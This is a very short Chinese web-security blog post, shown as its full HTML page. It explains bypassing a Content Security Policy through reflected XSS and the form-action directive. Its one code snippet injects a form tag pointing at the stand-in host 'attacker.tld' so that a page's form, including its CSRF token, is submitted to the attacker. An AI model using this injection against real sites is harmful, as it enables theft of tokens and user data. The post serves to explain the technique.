<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>反射型XSSbyPassCSP | Panda Blogs</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="front_side_security">
    <meta name="description" content="通过反射型 XSS 绕过配合 form-action 绕过 CSP form action指令重写html中的form action指令1234567&amp;lt;div&amp;gt;    &amp;lt;form action=”http://attacker.tld”&amp;gt;&amp;lt;/div&amp;gt;    &amp;lt;form method=”POST” id=”subscribe” action=”/api/v1">
<meta name="keywords" content="front_side_security">
<meta property="og:type" content="article">
<meta property="og:title" content="反射型XSSbyPassCSP">
<meta property="og:url" content="http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/index.html">
<meta property="og:site_name" content="Panda Blogs">
<meta property="og:description" content="通过反射型 XSS 绕过配合 form-action 绕过 CSP form action指令重写html中的form action指令1234567&amp;lt;div&amp;gt;    &amp;lt;form action=”http://attacker.tld”&amp;gt;&amp;lt;/div&amp;gt;    &amp;lt;form method=”POST” id=”subscribe” action=”/api/v1">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2018-11-29T10:56:57.064Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="反射型XSSbyPassCSP">
<meta name="twitter:description" content="通过反射型 XSS 绕过配合 form-action 绕过 CSP form action指令重写html中的form action指令1234567&amp;lt;div&amp;gt;    &amp;lt;form action=”http://attacker.tld”&amp;gt;&amp;lt;/div&amp;gt;    &amp;lt;form method=”POST” id=”subscribe” action=”/api/v1">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide">
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/touxiang.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">达闻西</h5>
          <a href="mailto:836475291@qq.com" title="836475291@qq.com" class="mail">836475291@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/">
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives">
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags">
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories">
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/pandatea" target="_blank">
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://weibo.com/u/2290808041/" target="_blank">
                <i class="icon icon-lg icon-weibo"></i>
                Weibo
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/custom">
                <i class="icon icon-lg icon-link"></i>
                测试
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">反射型XSSbyPassCSP</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">反射型XSSbyPassCSP</h1>
        <h5 class="subtitle">
            
                <time datetime="2018-11-29T10:55:07.000Z" itemprop="datePublished" class="page-time">
  2018-11-29
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#form-action指令"><span class="post-toc-number">1.</span> <span class="post-toc-text">form action指令</span></a></li></ol>
        </nav>
    </aside>


<article id="post-反射型XSSbyPassCSP" class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">反射型XSSbyPassCSP</h1>
        <div class="post-meta">
            <time class="post-time" title="2018-11-29 18:55:07" datetime="2018-11-29T10:55:07.000Z" itemprop="datePublished">2018-11-29</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style="display:none">
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <p>通过反射型 XSS 绕过配合 form-action 绕过 CSP</p>
<h3 id="form-action指令"><a href="#form-action指令" class="headerlink" title="form action指令"></a>form action指令</h3><p>重写html中的form action指令<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;div&gt;</span><br><span class="line">    &lt;form action=”http://attacker.tld”&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">    &lt;form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”&gt;</span><br><span class="line">        &lt;input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” /&gt;</span><br><span class="line">        &lt;input type=”submit” value=”Subscribe to newsletter” /&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure></p>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2018-11-29T10:56:57.064Z" itemprop="dateUpdated">2018-11-29 18:56:57</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2018/11/29/反射型XSSbyPassCSP/" target="_blank" rel="external">http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/</a>
        
    </div>
    
    <footer>
        <a href="http://leepanda.gitee.io">
            <img src="/img/touxiang.jpg" alt="达闻西">
            达闻西
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/front-side-security/">front_side_security</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&title=《反射型XSSbyPassCSP》 — Panda Blogs&pic=http://leepanda.gitee.io/img/touxiang.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&title=《反射型XSSbyPassCSP》 — Panda Blogs&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《反射型XSSbyPassCSP》 — Panda Blogs&url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&via=http://leepanda.gitee.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2018/11/29/CORS跨源资源共享协议/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">CORS协议安全研究</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2018/11/29/OAuth2协议流程/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">OAuth2协议流程</h4>
      </a>
    </div>
  
</nav>



    

















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/zhifu.jpg" alt="打赏二维码">
        </div>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style="display:none">
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style="display:none">
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>This blog is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>达闻西 &copy; 2018</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&title=《反射型XSSbyPassCSP》 — Panda Blogs&pic=http://leepanda.gitee.io/img/touxiang.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&title=《反射型XSSbyPassCSP》 — Panda Blogs&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《反射型XSSbyPassCSP》 — Panda Blogs&url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/&via=http://leepanda.gitee.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://leepanda.gitee.io/2018/11/29/反射型XSSbyPassCSP/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
